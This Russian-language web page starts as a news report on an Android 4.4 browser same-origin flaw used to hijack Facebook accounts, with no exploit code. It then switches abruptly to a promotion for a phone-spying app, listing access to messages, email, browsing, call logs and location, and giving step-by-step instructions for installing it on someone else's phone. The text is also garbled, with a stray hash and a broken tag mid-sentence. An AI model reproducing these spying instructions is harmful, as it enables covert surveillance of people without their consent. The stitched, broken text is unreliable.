Уязвимость браузера Android ставит под угрозу аккаунты Facebook

6c047d5d1fad67f6314ef83a6185c380 В результате исследований было установлено, что в браузере ОС Android версии 4.4 имеется брешь, позволяющая обходить стандартную политику единства приложений. Об уязвимости сообщили представители Trend Micro и Facebook, первые отчёты датируются сентябрём прошлого года.

Были зафиксированы многочисленные случаи взлома конфиденциальной информации в аккаунтах пользователей именно посредством данной уязвимости. Более того, специальный эксплоит, использующих эту брешь, находится в свободном доступе. Этим и объясняется многочисленность кибератак, для которых не нужно обладать какими-то особыми знаниями.

В ранних версиях Android использовались иные уязвимости SOP браузеров, в результате которых становились доступными XSS-атаки. В устройство жертвы перемещался специальный файл, который извлекался из предварительно настроенного облачного хранилища. Сам код файла писался JavaScript, поэтому обнаружить его было затруднительно. Даже если на смартфоне имелся антивирус, он никак не реагировал на подобное вмешательство в систему извне. Через тэг

происходило редактирование HTML-кода на странице Facebook, где активировался скрипт. В итоге на экран выводилось лишь изображение 1 на 1 пиксель.

JavaScript позволяет производить различные действия от имени атакованной страницы, включая и полный саботаж учётной записи. Подобное было зафиксировано и в официальных приложениях для BlackBerry. Похищенные подобным образом маркеры доступа использовались злоумышленниками для дальнейшего перехвата логинов и паролей, а затем и для смены конфиденциальных данных пользователей социальной сети. Миллионы смартфонов под управлением Android ниже KitKat могут быть подвержены данной уязвимости.

Ещё в сентябре корпорация Google выпустила своевременное исправление ошибки, но ситуации это не меняет. Всё дело в том, что многие производители смартфонов под Android давно перестали поддерживать устройства, поэтому мобильники работают на старых версиях ПО. Количество таких смартфонов может исчисляться десятками миллионов единиц! Поскольку SOP браузер Android, установленный в системе по умолчанию, имеет подобную уязвимость, его рекомендуется отключить. Удаление стандартными средствами ОС затруднительно, но владельцы мобильников с Root-правами могут деинсталлировать его сторонними утилитами. Это также повысить безопасность системы.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.